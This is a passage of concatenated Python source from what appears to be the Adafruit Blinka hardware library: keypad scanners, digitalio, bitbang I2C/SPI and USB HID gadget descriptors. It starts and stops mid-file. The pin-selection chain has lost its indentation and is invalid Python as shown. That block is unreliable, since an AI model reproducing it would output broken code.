            and the cathodes should be connected to the row pins. If your diodes are reversed,
            set ``columns_to_anodes`` to ``False``.
        :param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
            ``interval`` is in float seconds. The default is 0.020 (20 msecs).
        :param int max_events: maximum size of the `events` queue:
            maximum number of key transition events that are saved.
            Must be >= 1.
            If a new event arrives when the queue is full, that event is
            discarded and ``events.overflowed`` is set.
        """
        self._row_digitalinouts = []
        for row_pin in row_pins:
            row_dio = digitalio.DigitalInOut(row_pin)
            row_dio.switch_to_input(
                pull=(digitalio.Pull.UP if columns_to_anodes else digitalio.Pull.DOWN)
            )
            self._row_digitalinouts.append(row_dio)
        self._column_digitalinouts = []
        for column_pin in column_pins:
            col_dio = digitalio.DigitalInOut(column_pin)
            col_dio.switch_to_input(
                pull=(digitalio.Pull.UP if columns_to_anodes else digitalio.Pull.DOWN)
            )
            self._column_digitalinouts.append(col_dio)
        self._currently_pressed = [False] * len(column_pins) * len(row_pins)
        self._previously_pressed = [False] * len(column_pins) * len(row_pins)
        self._columns_to_anodes = columns_to_anodes
        super().__init__(interval, max_events, self._keypad_keymatrix_scan)

    # pylint: enable=too-many-arguments

    @property
    def key_count(self):
        """The number of keys that are being scanned. (read-only)"""
        return len(self._row_digitalinouts) * len(self._column_digitalinouts)

    def deinit(self):
        """Stop scanning and release the pins."""
        super().deinit()
        for row_dio in self._row_digitalinouts:
            row_dio.deinit()
        for col_dio in self._column_digitalinouts:
            col_dio.deinit()

    def reset(self):
        """
        Reset the internal state of the scanner to assume that all keys are now released.
        Any key that is already pressed at the time of this call will therefore immediately cause
        a new key-pressed event to occur.
        """
        # Use two distinct lists. The previous chained assignment aliased one
        # list to both names, which made the scan's previous/current
        # comparison always equal, suppressing all further events.
        self._previously_pressed = [False] * self.key_count
        self._currently_pressed = [False] * self.key_count

    def _row_column_to_key_number(self, row, column):
        # Row-major key numbering, as documented in the class docstring.
        return row * len(self._column_digitalinouts) + column

    def _keypad_keymatrix_scan(self):
        # Drive one row at a time to the active level, then sample every
        # column and queue an Event for each changed key.
        for row, row_dio in enumerate(self._row_digitalinouts):
            row_dio.switch_to_output(
                value=(not self._columns_to_anodes),
                drive_mode=digitalio.DriveMode.PUSH_PULL,
            )
            for col, col_dio in enumerate(self._column_digitalinouts):
                key_number = self._row_column_to_key_number(row, col)
                self._previously_pressed[key_number] = self._currently_pressed[
                    key_number
                ]
                current = col_dio.value != self._columns_to_anodes
                self._currently_pressed[key_number] = current
                if self._previously_pressed[key_number] != current:
                    self._events.keypad_eventqueue_record(key_number, current)
            # Return the row pin to an input so it doesn't fight the next row.
            row_dio.value = self._columns_to_anodes
            row_dio.switch_to_input(
                pull=(
                    digitalio.Pull.UP
                    if self._columns_to_anodes
                    else digitalio.Pull.DOWN
                )
            )
class ShiftRegisterKeys(_KeysBase):
    """Manage a set of keys attached to an incoming shift register."""

    def __init__(
        self,
        *,
        clock,
        data,
        latch,
        value_to_latch=True,
        key_count,
        value_when_pressed,
        interval=0.02,
        max_events=64,
    ):
        """
        Create a `ShiftRegisterKeys` object that will scan keys attached to a
        parallel-in serial-out shift register like the 74HC165 or CD4021.
        Note that you may chain shift registers to load in as many values as you need.

        Key number 0 is the first (or more properly, the zero-th) bit read. In the
        74HC165, this bit is labeled ``Q7``. Key number 1 will be the value of ``Q6``, etc.

        An event queue is created when this object is created and is available in the
        `events` attribute.

        :param microcontroller.Pin clock: The shift register clock pin.
            The shift register should clock on a low-to-high transition.
        :param microcontroller.Pin data: the incoming shift register data pin
        :param microcontroller.Pin latch:
            Pin used to latch parallel data going into the shift register.
        :param bool value_to_latch: Pin state to latch data being read.
            ``True`` if the data is latched when ``latch`` goes high;
            ``False`` if the data is latched when ``latch`` goes low.
            The default is ``True``, which is how the 74HC165 operates. The CD4021 latch is
            the opposite. Once the data is latched, it will be shifted out by toggling the
            clock pin.
        :param int key_count: number of data lines to clock in
        :param bool value_when_pressed: ``True`` if the pin reads high when the key is pressed.
            ``False`` if the pin reads low (is grounded) when the key is pressed.
        :param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
            ``interval`` is in float seconds. The default is 0.020 (20 msecs).
        :param int max_events: maximum size of the `events` queue:
            maximum number of key transition events that are saved.
            Must be >= 1.
            If a new event arrives when the queue is full, that event is
            discarded and ``events.overflowed`` is set.
        """
        clock_dio = digitalio.DigitalInOut(clock)
        clock_dio.switch_to_output(
            value=False, drive_mode=digitalio.DriveMode.PUSH_PULL
        )
        self._clock = clock_dio
        data_dio = digitalio.DigitalInOut(data)
        data_dio.switch_to_input()
        self._data = data_dio
        latch_dio = digitalio.DigitalInOut(latch)
        latch_dio.switch_to_output(value=True, drive_mode=digitalio.DriveMode.PUSH_PULL)
        self._latch = latch_dio
        self._value_to_latch = value_to_latch
        self._currently_pressed = [False] * key_count
        self._previously_pressed = [False] * key_count
        self._value_when_pressed = value_when_pressed
        self._key_count = key_count
        super().__init__(interval, max_events, self._keypad_shiftregisterkeys_scan)

    def deinit(self):
        """Stop scanning and release the pins."""
        super().deinit()
        self._clock.deinit()
        self._data.deinit()
        self._latch.deinit()

    def reset(self):
        """
        Reset the internal state of the scanner to assume that all keys are now released.
        Any key that is already pressed at the time of this call will therefore immediately cause
        a new key-pressed event to occur.
        """
        # Use two distinct lists. The previous chained assignment aliased one
        # list to both names, which made the scan's previous/current
        # comparison always equal, suppressing all further events.
        self._currently_pressed = [False] * self._key_count
        self._previously_pressed = [False] * self._key_count

    @property
    def key_count(self):
        """The number of keys that are being scanned. (read-only)"""
        return self._key_count

    @property
    def events(self):
        """The event queue associated with this `ShiftRegisterKeys` object.
        (read-only)  Same object as the base-class property.
        """
        return self._events

    def _keypad_shiftregisterkeys_scan(self):
        # Latch the parallel inputs, then clock each bit out of the register,
        # queueing an Event for any key whose state changed.
        self._latch.value = self._value_to_latch
        for key_number in range(self._key_count):
            self._clock.value = False
            self._previously_pressed[key_number] = self._currently_pressed[key_number]
            current = self._data.value == self._value_when_pressed
            self._currently_pressed[key_number] = current
            self._clock.value = True
            if self._previously_pressed[key_number] != current:
                self._events.keypad_eventqueue_record(key_number, current)
        self._latch.value = not self._value_to_latch
import sys
from adafruit_blinka.agnostic import detector
# pylint: disable=ungrouped-imports,wrong-import-position,unused-import
# Select the AnalogIn/AnalogOut implementation for the detected board/chip.
# Order matters: specific boards are checked before generic chip families.
if detector.board.microchip_mcp2221:
    from adafruit_blinka.microcontroller.mcp2221.analogio import AnalogIn
    from adafruit_blinka.microcontroller.mcp2221.analogio import AnalogOut
elif detector.board.greatfet_one:
    from adafruit_blinka.microcontroller.nxp_lpc4330.analogio import AnalogIn
    from adafruit_blinka.microcontroller.nxp_lpc4330.analogio import AnalogOut
elif detector.board.any_siemens_simatic_iot2000:
    from adafruit_blinka.microcontroller.am65xx.analogio import AnalogIn
    from adafruit_blinka.microcontroller.am65xx.analogio import AnalogOut
elif (
    # These Linux SoCs all expose ADCs through the generic sysfs IIO
    # interface, so they share one AnalogIn implementation (input only).
    detector.chip.RK3308
    or detector.chip.RK3399
    or detector.chip.RK3588
    or detector.chip.RK3568
    or detector.chip.RK3566
    or detector.chip.IMX6ULL
    or detector.chip.STM32MP157
):
    from adafruit_blinka.microcontroller.generic_linux.sysfs_analogin import AnalogIn
elif "sphinx" in sys.modules:
    # Building documentation: no hardware backend required.
    pass
elif detector.board.pico_u2if:
    from adafruit_blinka.microcontroller.rp2040_u2if.analogio import (
        AnalogIn_Pico as AnalogIn,
    )
elif detector.board.feather_u2if:
    from adafruit_blinka.microcontroller.rp2040_u2if.analogio import (
        AnalogIn_Feather as AnalogIn,
    )
elif detector.board.qtpy_u2if:
    from adafruit_blinka.microcontroller.rp2040_u2if.analogio import (
        AnalogIn_QTPY as AnalogIn,
    )
elif detector.board.itsybitsy_u2if:
    from adafruit_blinka.microcontroller.rp2040_u2if.analogio import (
        AnalogIn_ItsyBitsy as AnalogIn,
    )
else:
    raise NotImplementedError("analogio not supported for this board.")
from adafruit_blinka.agnostic import board_id, detector
# pylint: disable=ungrouped-imports,wrong-import-position
# By Chip Class
if detector.chip.BCM2XXX:
from adafruit_blinka.microcontroller.bcm283x.pin import Pin
elif detector.chip.AM33XX:
from adafruit_blinka.microcontroller.am335x.pin import Pin
elif detector.chip.AM65XX:
from adafruit_blinka.microcontroller.am65xx.pin import Pin
elif detector.chip.JH71x0:
from adafruit_blinka.microcontroller.starfive.JH71x0.pin import Pin
elif detector.chip.DRA74X:
from adafruit_blinka.microcontroller.dra74x.pin import Pin
elif detector.chip.SUN8I:
from adafruit_blinka.microcontroller.allwinner.h3.pin import Pin
elif detector.chip.SAMA5:
from adafruit_blinka.microcontroller.sama5.pin import Pin
elif detector.chip.T210:
from adafruit_blinka.microcontroller.tegra.t210.pin import Pin
elif detector.chip.T186:
from adafruit_blinka.microcontroller.tegra.t186.pin import Pin
elif detector.chip.T194:
from adafruit_blinka.microcontroller.tegra.t194.pin import Pin
elif detector.chip.T234:
from adafruit_blinka.microcontroller.tegra.t234.pin import Pin
elif detector.chip.S905:
from adafruit_blinka.microcontroller.amlogic.s905.pin import Pin
elif detector.chip.S905X:
from adafruit_blinka.microcontroller.amlogic.s905x.pin import Pin
elif detector.chip.S905X3:
from adafruit_blinka.microcontroller.amlogic.s905x3.pin import Pin
elif detector.chip.S905Y2:
from adafruit_blinka.microcontroller.amlogic.s905y2.pin import Pin
elif detector.chip.S922X:
from adafruit_blinka.microcontroller.amlogic.s922x.pin import Pin
elif detector.chip.A311D:
from adafruit_blinka.microcontroller.amlogic.a311d.pin import Pin
elif detector.chip.EXYNOS5422:
from adafruit_blinka.microcontroller.samsung.exynos5422.pin import Pin
elif detector.chip.APQ8016:
from adafruit_blinka.microcontroller.snapdragon.apq8016.pin import Pin
elif detector.chip.IMX8MX:
from adafruit_blinka.microcontroller.nxp_imx8m.pin import Pin
elif detector.chip.IMX6ULL:
from adafruit_blinka.microcontroller.nxp_imx6ull.pin import Pin
elif detector.chip.HFU540:
from adafruit_blinka.microcontroller.hfu540.pin import Pin
elif detector.chip.A64:
from adafruit_blinka.microcontroller.allwinner.a64.pin import Pin
elif detector.chip.A33:
from adafruit_blinka.microcontroller.allwinner.a33.pin import Pin
elif detector.chip.MIPS24KEC:
from adafruit_blinka.microcontroller.mips24kec.pin import Pin
elif detector.chip.RK3308:
from adafruit_blinka.microcontroller.rockchip.rk3308.pin import Pin
elif detector.chip.RK3399:
from adafruit_blinka.microcontroller.rockchip.rk3399.pin import Pin
elif detector.chip.RK3399_T:
from adafruit_blinka.microcontroller.rockchip.rk3399.pin import Pin
elif detector.chip.RK3588:
from adafruit_blinka.microcontroller.rockchip.rk3588.pin import Pin
elif detector.chip.RK3328:
from adafruit_blinka.microcontroller.rockchip.rk3328.pin import Pin
elif detector.chip.RK3566:
from adafruit_blinka.microcontroller.rockchip.rk3566.pin import Pin
elif detector.chip.RK3568:
from adafruit_blinka.microcontroller.rockchip.rk3568.pin import Pin
elif detector.chip.PENTIUM_N3710:
from adafruit_blinka.microcontroller.pentium.n3710.pin import Pin
elif detector.chip.ATOM_J4105:
from adafruit_blinka.microcontroller.pentium.j4105.pin import Pin
elif detector.chip.STM32MP157:
from adafruit_blinka.microcontroller.stm32.stm32mp157.pin import Pin
elif detector.chip.MT8167:
from adafruit_blinka.microcontroller.mt8167.pin import Pin
elif detector.chip.H3:
from adafruit_blinka.microcontroller.allwinner.h3.pin import Pin
elif detector.chip.H5:
from adafruit_blinka.microcontroller.allwinner.h5.pin import Pin
elif detector.chip.H6:
from adafruit_blinka.microcontroller.allwinner.h6.pin import Pin
elif detector.chip.H616:
from adafruit_blinka.microcontroller.allwinner.h616.pin import Pin
elif detector.chip.D1_RISCV:
from adafruit_blinka.microcontroller.allwinner.D1.pin import Pin
# Special Case Boards
elif detector.board.ftdi_ft232h:
from adafruit_blinka.microcontroller.ftdi_mpsse.ft232h.pin import Pin
elif detector.board.ftdi_ft2232h:
from adafruit_blinka.microcontroller.ftdi_mpsse.ft2232h.pin import Pin
elif detector.board.binho_nova:
from adafruit_blinka.microcontroller.nova.pin import Pin
elif detector.board.greatfet_one:
from adafruit_blinka.microcontroller.nxp_lpc4330.pin import Pin
elif detector.board.microchip_mcp2221:
from adafruit_blinka.microcontroller.mcp2221.pin import Pin
elif detector.chip.RP2040_U2IF:
from adafruit_blinka.microcontroller.rp2040_u2if.pin import Pin
# MicroPython Chips
elif detector.chip.STM32F405:
from machine import Pin
elif detector.chip.RP2040:
from machine import Pin
from adafruit_blinka import Enum, ContextManaged
class DriveMode(Enum):
    """Drive Mode Enumeration"""

    # Placeholders; replaced with singleton instances immediately after the
    # class body so values can be compared with `is`.
    PUSH_PULL = None
    OPEN_DRAIN = None


DriveMode.PUSH_PULL = DriveMode()
DriveMode.OPEN_DRAIN = DriveMode()
class Direction(Enum):
    """Direction Enumeration"""

    # Placeholders; replaced with singleton instances immediately after the
    # class body so values can be compared with `is`.
    INPUT = None
    OUTPUT = None


Direction.INPUT = Direction()
Direction.OUTPUT = Direction()
class Pull(Enum):
    """PullUp/PullDown Enumeration"""

    # Placeholders; replaced with singleton instances immediately after the
    # class body so values can be compared with `is`.
    # A distinct NONE value is intentionally not defined; `None` itself is
    # used to mean "no pull".
    UP = None
    DOWN = None
    # NONE=None


Pull.UP = Pull()
Pull.DOWN = Pull()
# Pull.NONE = Pull()
class DigitalInOut(ContextManaged):
    """DigitalInOut CircuitPython compatibility implementation"""

    _pin = None

    def __init__(self, pin):
        """Create a DigitalInOut for ``pin``; it starts out as an input."""
        self._pin = Pin(pin.id)
        self.direction = Direction.INPUT

    def switch_to_output(self, value=False, drive_mode=DriveMode.PUSH_PULL):
        """Switch the Digital Pin Mode to Output"""
        self.direction = Direction.OUTPUT
        self.value = value
        self.drive_mode = drive_mode

    def switch_to_input(self, pull=None):
        """Switch the Digital Pin Mode to Input"""
        self.direction = Direction.INPUT
        self.pull = pull

    def deinit(self):
        """Deinitialize the Digital Pin"""
        del self._pin

    @property
    def direction(self):
        """Get or Set the Digital Pin Direction"""
        return self.__direction

    @direction.setter
    def direction(self, value):
        self.__direction = value
        if value is Direction.OUTPUT:
            self._pin.init(mode=Pin.OUT)
            # Outputs start low, in push-pull mode.
            self.value = False
            self.drive_mode = DriveMode.PUSH_PULL
        elif value is Direction.INPUT:
            self._pin.init(mode=Pin.IN)
            self.pull = None
        else:
            raise AttributeError("Not a Direction")

    @property
    def value(self):
        """The Digital Pin Value"""
        return self._pin.value() == 1

    @value.setter
    def value(self, val):
        if self.direction is Direction.OUTPUT:
            self._pin.value(1 if val else 0)
        else:
            raise AttributeError("Not an output")

    @property
    def pull(self):
        """The pin pull direction"""
        if self.direction is Direction.INPUT:
            return self.__pull
        raise AttributeError("Not an input")

    @pull.setter
    def pull(self, pul):
        if self.direction is Direction.INPUT:
            self.__pull = pul
            if pul is Pull.UP:
                self._pin.init(mode=Pin.IN, pull=Pin.PULL_UP)
            elif pul is Pull.DOWN:
                # Not every MicroPython port exposes an internal pull-down.
                if hasattr(Pin, "PULL_DOWN"):
                    self._pin.init(mode=Pin.IN, pull=Pin.PULL_DOWN)
                else:
                    raise NotImplementedError(
                        "{} unsupported on {}".format(Pull.DOWN, board_id)
                    )
            elif pul is None:
                self._pin.init(mode=Pin.IN, pull=None)
            else:
                raise AttributeError("Not a Pull")
        else:
            raise AttributeError("Not an input")

    @property
    def drive_mode(self):
        """The Digital Pin Drive Mode"""
        if self.direction is Direction.OUTPUT:
            return self.__drive_mode
        raise AttributeError("Not an output")

    @drive_mode.setter
    def drive_mode(self, mod):
        if mod is DriveMode.OPEN_DRAIN:
            self._pin.init(mode=Pin.OPEN_DRAIN)
        elif mod is DriveMode.PUSH_PULL:
            self._pin.init(mode=Pin.OUT)
        else:
            # Consistent with the direction/pull setters: reject unknown
            # modes instead of silently storing them (previous behavior).
            raise AttributeError("Not a DriveMode")
        # Record the mode only after it has been validated and applied.
        self.__drive_mode = mod
import adafruit_platformdetect.constants.boards as ap_board
from adafruit_blinka import Lockable, agnostic
# pylint: disable=import-outside-toplevel,too-many-arguments
class I2C(Lockable):
    """Bitbang/Software I2C implementation"""

    def __init__(self, scl, sda, frequency=400000):
        """Create a software I2C bus on the given SCL/SDA pins.

        Raises NotImplementedError on platforms that must use a different
        bitbang implementation instead.
        """
        # TODO: This one is a bit questionable:
        if agnostic.board_id == ap_board.PYBOARD:
            raise NotImplementedError("No software I2C on {}".format(agnostic.board_id))
        if agnostic.detector.board.any_embedded_linux:
            # TODO: Attempt to load this library automatically
            raise NotImplementedError(
                "For bitbangio on Linux, please use Adafruit_CircuitPython_BitbangIO"
            )
        self.init(scl, sda, frequency)

    def init(self, scl, sda, frequency):
        """Initialization"""
        from machine import Pin
        from machine import I2C as _I2C

        self.deinit()
        # id=-1 forces the bitbanged implementation; a future version could
        # introspect the platform to see whether SDA/SCL match a hardware I2C.
        self._i2c = _I2C(-1, Pin(scl.id), Pin(sda.id), freq=frequency)

    def deinit(self):
        """Deinitialization"""
        if hasattr(self, "_i2c"):
            del self._i2c

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.deinit()

    def scan(self):
        """Scan for attached devices"""
        return self._i2c.scan()

    def readfrom_into(self, address, buffer, start=0, end=None):
        """Read from a device at specified address into a buffer"""
        if start != 0 or end is not None:
            # Narrow the target region without copying.
            stop_index = len(buffer) if end is None else end
            buffer = memoryview(buffer)[start:stop_index]
        return self._i2c.readfrom_into(address, buffer, True)

    def writeto(self, address, buffer, start=0, end=None, stop=True):
        """Write to a device at specified address from a buffer"""
        if start == 0 and end is None:
            return self._i2c.writeto(address, buffer, stop)
        # memoryview avoids copying the sliced region; [start:None] == [start:].
        return self._i2c.writeto(address, memoryview(buffer)[start:end], stop)
# TODO untested, as actually busio.SPI was on
# tasklist https://github.com/adafruit/Adafruit_Micropython_Blinka/issues/2 :(
class SPI(Lockable):
    """Bitbang/Software SPI implementation"""

    def __init__(self, clock, MOSI=None, MISO=None):
        """Create a software SPI bus on the given clock/MOSI/MISO pins."""
        if agnostic.detector.board.any_embedded_linux:
            # TODO: Attempt to load this library automatically
            raise NotImplementedError(
                "For bitbangio on Linux, please use Adafruit_CircuitPython_BitbangIO"
            )
        from machine import SPI as _SPI

        self._spi = _SPI(-1)
        self._pins = (clock, MOSI, MISO)

    def configure(self, baudrate=100000, polarity=0, phase=0, bits=8):
        """Update the configuration"""
        from machine import Pin
        from machine import SPI as _SPI

        if self._locked:
            # TODO verify if _spi obj 'caches' sck, mosi, miso to
            # avoid storing in _attributeIds (duplicated in busio)
            # i.e. #init ignores MOSI=None rather than unsetting
            self._spi.init(
                baudrate=baudrate,
                polarity=polarity,
                phase=phase,
                bits=bits,
                firstbit=_SPI.MSB,
                sck=Pin(self._pins[0].id),
                mosi=Pin(self._pins[1].id),
                miso=Pin(self._pins[2].id),
            )
        else:
            raise RuntimeError("First call try_lock()")

    def write(self, buf):
        """Write to the SPI device"""
        return self._spi.write(buf)

    def readinto(self, buf):
        """Read from the SPI device into a buffer"""
        # Fix: delegate to the underlying machine.SPI object; the previous
        # code called this method recursively, causing infinite recursion.
        return self._spi.readinto(buf)

    def write_readinto(self, buffer_out, buffer_in):
        """Write to the SPI device and read from the SPI device into a buffer"""
        # Fix: delegate to the underlying machine.SPI object; the previous
        # code called this method recursively, causing infinite recursion.
        return self._spi.write_readinto(buffer_out, buffer_in)
from typing import Sequence
from pathlib import Path
import os
import atexit
import sys
# Fail fast at import time if kernel support for USB gadget mode is missing.
# Read /proc/modules once instead of once per module name.
_loaded_modules = Path("/proc/modules").read_text(encoding="utf-8")
for module in ["dwc2", "libcomposite"]:
    if module not in _loaded_modules:
        raise Exception(
            "%s module not present in your kernel. did you insmod it?" % module
        )
# `this` lets module-level functions read and write module globals explicitly.
this = sys.modules[__name__]
this.gadget_root = "/sys/kernel/config/usb_gadget/adafruit-blinka"
this.boot_device = 0
this.devices = []
class Device:
    """
    HID Device specification: see
    https://github.com/adafruit/circuitpython/blob/main/shared-bindings/usb_hid/Device.c

    Holds a raw HID report descriptor plus the usage/report metadata that
    the gadget setup code writes into configfs.
    """

    def __init__(
        self,
        *,
        descriptor: bytes,
        usage_page: int,
        usage: int,
        report_ids: Sequence[int],
        in_report_lengths: Sequence[int],
        out_report_lengths: Sequence[int],
    ) -> None:
        # Report metadata is stored as-is; indices into the three sequences
        # correspond to the same positions in report_ids.
        self.out_report_lengths = out_report_lengths
        self.in_report_lengths = in_report_lengths
        self.report_ids = report_ids
        self.usage = usage
        self.usage_page = usage_page
        self.descriptor = descriptor
        # Cache of the most recent OUT report read from the hidg device.
        self._last_received_report = None

    def send_report(self, report: bytearray, report_id: int = None):
        """Send an HID report. If the device descriptor specifies zero or one report id's,
        you can supply `None` (the default) as the value of ``report_id``.
        Otherwise you must specify which report id to use when sending the report.
        """
        # NOTE(review): `or` treats an explicit report_id of 0 like None and
        # substitutes report_ids[0]; harmless for the boot devices here,
        # whose only report id is 0 — confirm if other 0-id devices appear.
        report_id = report_id or self.report_ids[0]
        device_path = self.get_device_path(report_id)
        with open(device_path, "rb+") as fd:
            if report_id > 0:
                # Numbered reports are sent with the id prefixed to the data.
                report = bytearray(report_id.to_bytes(1, "big")) + report
            fd.write(report)

    @property
    def last_received_report(
        self,
    ) -> bytes:
        """The HID OUT report as a `bytes` (read-only). `None` if nothing received.
        Same as `get_last_received_report()` with no argument.
        Deprecated: will be removed in CircutPython 8.0.0. Use `get_last_received_report()` instead.
        """
        return self.get_last_received_report()

    def get_last_received_report(self, report_id=None) -> bytes:
        """Get the last received HID OUT or feature report for the given report ID.
        The report ID may be omitted if there is no report ID, or only one report ID.
        Return `None` if nothing received.
        """
        device_path = self.get_device_path(report_id or self.report_ids[0])
        with open(device_path, "rb+") as fd:
            # Non-blocking read: returns None when no report is pending, in
            # which case the previously cached report is returned instead.
            os.set_blocking(fd.fileno(), False)
            # NOTE(review): always reads out_report_lengths[0], even when a
            # different report_id was requested — confirm for multi-report
            # devices.
            report = fd.read(self.out_report_lengths[0])
            if report is not None:
                self._last_received_report = report
        return self._last_received_report

    def get_device_path(self, report_id):
        """
        translates the /dev/hidg device from the report id
        """
        # configfs exposes the function's "major:minor" in hid.usbN/dev;
        # the minor number selects the matching /dev/hidgN node.
        device = (
            Path(
                "%s/functions/hid.usb%s/dev"
                % (this.gadget_root, report_id or self.report_ids[0])
            )
            .read_text(encoding="utf-8")
            .strip()
            .split(":")[1]
        )
        device_path = "/dev/hidg%s" % device
        return device_path

    # Standard devices; populated with instances right after the class body,
    # at module import time.
    KEYBOARD = None
    MOUSE = None
    CONSUMER_CONTROL = None
# Standard keyboard: report ID 1; 8 modifier bits, 1 reserved byte,
# 5 LED output bits (+3 padding), and 6 keycode slots.
Device.KEYBOARD = Device(
    descriptor=bytes((
        0x05, 0x01,        # usage page (generic desktop ctrls)
        0x09, 0x06,        # usage (keyboard)
        0xA1, 0x01,        # collection (application)
        0x85, 0x01,        # report ID (1)
        0x05, 0x07,        # usage page (kbrd/keypad)
        0x19, 0xE0,        # usage minimum (0xe0)
        0x29, 0xE7,        # usage maximum (0xe7)
        0x15, 0x00,        # logical minimum (0)
        0x25, 0x01,        # logical maximum (1)
        0x75, 0x01,        # report size (1)
        0x95, 0x08,        # report count (8)
        0x81, 0x02,        # input (data,var,abs)
        0x95, 0x01,        # report count (1)
        0x75, 0x08,        # report size (8)
        0x81, 0x01,        # input (const,array,abs)
        0x95, 0x03,        # report count (3)
        0x75, 0x01,        # report size (1)
        0x05, 0x08,        # usage page (leds)
        0x19, 0x01,        # usage minimum (num lock)
        0x29, 0x05,        # usage maximum (kana)
        0x91, 0x02,        # output (data,var,abs,non-volatile)
        0x95, 0x01,        # report count (1)
        0x75, 0x05,        # report size (5)
        0x91, 0x01,        # output (const,array,abs,non-volatile)
        0x95, 0x06,        # report count (6)
        0x75, 0x08,        # report size (8)
        0x15, 0x00,        # logical minimum (0)
        0x26, 0xFF, 0x00,  # logical maximum (255)
        0x05, 0x07,        # usage page (kbrd/keypad)
        0x19, 0x00,        # usage minimum (0x00)
        0x2A, 0xFF, 0x00,  # usage maximum (0xff)
        0x81, 0x00,        # input (data,array,abs)
        0xC0,              # end collection
    )),
    usage_page=0x1,
    usage=0x6,
    report_ids=[0x1],
    in_report_lengths=[8],
    out_report_lengths=[1],
)
# Standard mouse: report ID 2; 5 button bits (+3 padding), relative X/Y,
# and a wheel byte.
Device.MOUSE = Device(
    descriptor=bytes((
        0x05, 0x01,  # Usage Page (Generic Desktop Ctrls)
        0x09, 0x02,  # Usage (Mouse)
        0xA1, 0x01,  # Collection (Application)
        0x85, 0x02,  # Report ID (2)
        0x09, 0x01,  # Usage (Pointer)
        0xA1, 0x00,  # Collection (Physical)
        0x05, 0x09,  # Usage Page (Button)
        0x19, 0x01,  # Usage Minimum (0x01)
        0x29, 0x05,  # Usage Maximum (0x05)
        0x15, 0x00,  # Logical Minimum (0)
        0x25, 0x01,  # Logical Maximum (1)
        0x95, 0x05,  # Report Count (5)
        0x75, 0x01,  # Report Size (1)
        0x81, 0x02,  # Input (Data,Var,Abs)
        0x95, 0x01,  # Report Count (1)
        0x75, 0x03,  # Report Size (3)
        0x81, 0x01,  # Input (Const,Array,Abs)
        0x05, 0x01,  # Usage Page (Generic Desktop Ctrls)
        0x09, 0x30,  # Usage (X)
        0x09, 0x31,  # Usage (Y)
        0x15, 0x81,  # Logical Minimum (-127)
        0x25, 0x7F,  # Logical Maximum (127)
        0x75, 0x08,  # Report Size (8)
        0x95, 0x02,  # Report Count (2)
        0x81, 0x06,  # Input (Data,Var,Rel)
        0x09, 0x38,  # Usage (Wheel)
        0x15, 0x81,  # Logical Minimum (-127)
        0x25, 0x7F,  # Logical Maximum (127)
        0x75, 0x08,  # Report Size (8)
        0x95, 0x01,  # Report Count (1)
        0x81, 0x06,  # Input (Data,Var,Rel)
        0xC0,        # End Collection
        0xC0,        # End Collection
    )),
    usage_page=0x1,
    usage=0x02,
    report_ids=[0x02],
    in_report_lengths=[4],
    out_report_lengths=[0],
)
# Consumer control (media keys): report ID 3, one 16-bit usage code.
Device.CONSUMER_CONTROL = Device(
    descriptor=bytes((
        0x05, 0x0C,        # Usage Page (Consumer)
        0x09, 0x01,        # Usage (Consumer Control)
        0xA1, 0x01,        # Collection (Application)
        0x85, 0x03,        # Report ID (3)
        0x75, 0x10,        # Report Size (16)
        0x95, 0x01,        # Report Count (1)
        0x15, 0x01,        # Logical Minimum (1)
        0x26, 0x8C, 0x02,  # Logical Maximum (652)
        0x19, 0x01,        # Usage Minimum (Consumer Control)
        0x2A, 0x8C, 0x02,  # Usage Maximum (AC Send)
        0x81, 0x00,        # Input (Data,Array,Abs)
        0xC0,              # End Collection
    )),
    usage_page=0x0C,
    usage=0x01,
    report_ids=[3],
    in_report_lengths=[2],
    out_report_lengths=[0],
)
# Boot keyboard: identical layout to Device.KEYBOARD but with no report ID,
# as required by the HID boot protocol.
Device.BOOT_KEYBOARD = Device(
    descriptor=bytes((
        0x05, 0x01,        # usage page (generic desktop ctrls)
        0x09, 0x06,        # usage (keyboard)
        0xA1, 0x01,        # collection (application)
        0x05, 0x07,        # usage page (kbrd/keypad)
        0x19, 0xE0,        # usage minimum (0xe0)
        0x29, 0xE7,        # usage maximum (0xe7)
        0x15, 0x00,        # logical minimum (0)
        0x25, 0x01,        # logical maximum (1)
        0x75, 0x01,        # report size (1)
        0x95, 0x08,        # report count (8)
        0x81, 0x02,        # input (data,var,abs)
        0x95, 0x01,        # report count (1)
        0x75, 0x08,        # report size (8)
        0x81, 0x01,        # input (const,array,abs)
        0x95, 0x03,        # report count (3)
        0x75, 0x01,        # report size (1)
        0x05, 0x08,        # usage page (leds)
        0x19, 0x01,        # usage minimum (num lock)
        0x29, 0x05,        # usage maximum (kana)
        0x91, 0x02,        # output (data,var,abs,non-volatile)
        0x95, 0x01,        # report count (1)
        0x75, 0x05,        # report size (5)
        0x91, 0x01,        # output (const,array,abs,non-volatile)
        0x95, 0x06,        # report count (6)
        0x75, 0x08,        # report size (8)
        0x15, 0x00,        # logical minimum (0)
        0x26, 0xFF, 0x00,  # logical maximum (255)
        0x05, 0x07,        # usage page (kbrd/keypad)
        0x19, 0x00,        # usage minimum (0x00)
        0x2A, 0xFF, 0x00,  # usage maximum (0xff)
        0x81, 0x00,        # input (data,array,abs)
        0xC0,              # end collection
    )),
    usage_page=0x1,
    usage=0x6,
    report_ids=[0x0],
    in_report_lengths=[8],
    out_report_lengths=[1],
)
# Boot mouse: identical layout to Device.MOUSE but with no report ID,
# as required by the HID boot protocol.
Device.BOOT_MOUSE = Device(
    descriptor=bytes((
        0x05, 0x01,  # Usage Page (Generic Desktop Ctrls)
        0x09, 0x02,  # Usage (Mouse)
        0xA1, 0x01,  # Collection (Application)
        0x09, 0x01,  # Usage (Pointer)
        0xA1, 0x00,  # Collection (Physical)
        0x05, 0x09,  # Usage Page (Button)
        0x19, 0x01,  # Usage Minimum (0x01)
        0x29, 0x05,  # Usage Maximum (0x05)
        0x15, 0x00,  # Logical Minimum (0)
        0x25, 0x01,  # Logical Maximum (1)
        0x95, 0x05,  # Report Count (5)
        0x75, 0x01,  # Report Size (1)
        0x81, 0x02,  # Input (Data,Var,Abs)
        0x95, 0x01,  # Report Count (1)
        0x75, 0x03,  # Report Size (3)
        0x81, 0x01,  # Input (Const,Array,Abs)
        0x05, 0x01,  # Usage Page (Generic Desktop Ctrls)
        0x09, 0x30,  # Usage (X)
        0x09, 0x31,  # Usage (Y)
        0x15, 0x81,  # Logical Minimum (-127)
        0x25, 0x7F,  # Logical Maximum (127)
        0x75, 0x08,  # Report Size (8)
        0x95, 0x02,  # Report Count (2)
